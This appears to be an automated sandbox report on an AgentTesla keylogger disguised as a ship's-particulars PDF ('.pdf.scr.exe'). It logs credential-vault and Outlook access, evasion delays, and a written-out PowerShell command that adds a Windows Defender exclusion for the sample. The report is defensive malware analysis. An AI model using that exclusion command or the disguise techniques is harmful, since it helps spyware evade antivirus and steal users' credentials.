Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4186764037.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilename2ee75d06-d489-4537-90fc-92fe0f559436.exe4 vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000004.00000002.4186955073.0000000000BF9000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe | Binary or memory string: OriginalFilenameGfhv.exe4 vs MV BBG MUARA Ship's Particulars.pdf.scr.exe
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 4.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.37b3500.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.MV BBG MUARA Ship's Particulars.pdf.scr.exe.3778ee0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@6/4@2/2
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MV BBG MUARA Ship's Particulars.pdf.scr.exe.log
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2188:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11lz2jrg.ahb.ps1
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO [dbo].[CREDIT_PLAN] ([CREDIT_ID], [MATURITY_DATE], [MATURITY_SUM], [MATURITY_NOTE], [MODIF_DATE]) VALUES (@CREDIT_ID, @MATURITY_DATE, @MATURITY_SUM, @MATURITY_NOTE, @MODIF_DATE);
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE], [INTEREST]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE, @INTEREST);
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE [dbo].[Login] SET [User_id] = @User_id, [User_pass] = @User_pass WHERE (([User_id] = @Original_User_id) AND ([User_pass] = @Original_User_pass));
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE [dbo].[CREDIT_PLAN] SET [CREDIT_ID] = @CREDIT_ID, [MATURITY_DATE] = @MATURITY_DATE, [MATURITY_SUM] = @MATURITY_SUM, [MATURITY_NOTE] = @MATURITY_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([MATURITY_ID] = @Original_MATURITY_ID) AND ((@IsNull_CREDIT_ID = 1 AND [CREDIT_ID] IS NULL) OR ([CREDIT_ID] = @Original_CREDIT_ID)) AND ([MATURITY_DATE] = @Original_MATURITY_DATE) AND ([MATURITY_SUM] = @Original_MATURITY_SUM) AND ((@IsNull_MATURITY_NOTE = 1 AND [MATURITY_NOTE] IS NULL) OR ([MATURITY_NOTE] = @Original_MATURITY_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO [dbo].[PROD_PERIODS] ([PROD_CODE], [PROD_PERIOD]) VALUES (@PROD_CODE, @PROD_PERIOD);
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE [dbo].[INTEREST] SET [PROD_CODE] = @PROD_CODE, [PROD_PERIOD] = @PROD_PERIOD, [SUM_FROM] = @SUM_FROM, [SUM_TO] = @SUM_TO WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_PERIOD] = @Original_PROD_PERIOD) AND ([SUM_FROM] = @Original_SUM_FROM) AND ([SUM_TO] = @Original_SUM_TO));
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE [dbo].[CREDIT] SET [CREDIT_NO] = @CREDIT_NO, [CREDIT_DATE] = @CREDIT_DATE, [CREDIT_PERIOD] = @CREDIT_PERIOD, [CREDIT_END_DATE] = @CREDIT_END_DATE, [CREDIT_BEGIN_DATE] = @CREDIT_BEGIN_DATE, [CLIENT_ID] = @CLIENT_ID, [PROD_CODE] = @PROD_CODE, [CREDIT_SUM] = @CREDIT_SUM, [CREDIT_NOTE] = @CREDIT_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([CREDIT_ID] = @Original_CREDIT_ID) AND ([CREDIT_NO] = @Original_CREDIT_NO) AND ((@IsNull_CREDIT_DATE = 1 AND [CREDIT_DATE] IS NULL) OR ([CREDIT_DATE] = @Original_CREDIT_DATE)) AND ([CREDIT_PERIOD] = @Original_CREDIT_PERIOD) AND ((@IsNull_CREDIT_END_DATE = 1 AND [CREDIT_END_DATE] IS NULL) OR ([CREDIT_END_DATE] = @Original_CREDIT_END_DATE)) AND ((@IsNull_CREDIT_BEGIN_DATE = 1 AND [CREDIT_BEGIN_DATE] IS NULL) OR ([CREDIT_BEGIN_DATE] = @Original_CREDIT_BEGIN_DATE)) AND ([CLIENT_ID] = @Original_CLIENT_ID) AND ((@IsNull_PROD_CODE = 1 AND [PROD_CODE] IS NULL) OR ([PROD_CODE] = @Original_PROD_CODE)) AND ([CREDIT_SUM] = @Original_CREDIT_SUM) AND ((@IsNull_CREDIT_NOTE = 1 AND [CREDIT_NOTE] IS NULL) OR ([CREDIT_NOTE] = @Original_CREDIT_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE [dbo].[CREDIT_PRODUCT] SET [PROD_NAME] = @PROD_NAME, [PROD_ACTIVE] = @PROD_ACTIVE, [PROD_SUM_FROM] = @PROD_SUM_FROM, [PROD_SUM_TO] = @PROD_SUM_TO, [MODIF_DATE] = @MODIF_DATE WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_NAME] = @Original_PROD_NAME) AND ([PROD_ACTIVE] = @Original_PROD_ACTIVE) AND ([PROD_SUM_FROM] = @Original_PROD_SUM_FROM) AND ([PROD_SUM_TO] = @Original_PROD_SUM_TO) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe, 00000000.00000000.1718710623.0000000000032000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE);
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe | ReversingLabs: Detection: 47%
Source: unknown | Process created: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Process created: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Process created: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe "C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe"
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: ucrtbase_clr0400.dll (2 identical entries)
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: ucrtbase_clr0400.dll (2 identical entries)
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 0_2_00B5DB84 pushfd ; ret 0_2_00B5DB89
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_051E0C55 push edi; retf 4_2_051E0C7A
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_051EA9E0 push eax; iretd 4_2_051EAA99
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Code function: 4_2_0690F6F0 push es; ret 4_2_0690F6F4
Source: MV BBG MUARA Ship's Particulars.pdf.scr.exe | Static PE information: section name: .text entropy: 7.528323979837935

Hooking and other Techniques for Hiding and Protection

Source: Possible double extension: pdf.scr | Static PE information: MV BBG MUARA Ship's Particulars.pdf.scr.exe
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Process information set: NOOPENFILEERRORBOX (43 identical entries)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match | File source: Process Memory Space: MV BBG MUARA Ship's Particulars.pdf.scr.exe PID: 6712, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Memory allocated: 790000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Memory allocated: 2560000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Memory allocated: AB0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Memory allocated: 7370000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Memory allocated: 8370000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Memory allocated: 8520000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Memory allocated: 9520000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Memory allocated: 2C90000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Memory allocated: 2CE0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Memory allocated: 4CE0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 600000
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599890
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599781
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599672
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599562
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599453
                  Source: C:\Users\user\Desktop\MV BBG MUARA Ship's Particulars.pdf.scr.exe | Thread delayed: delay time: 599344
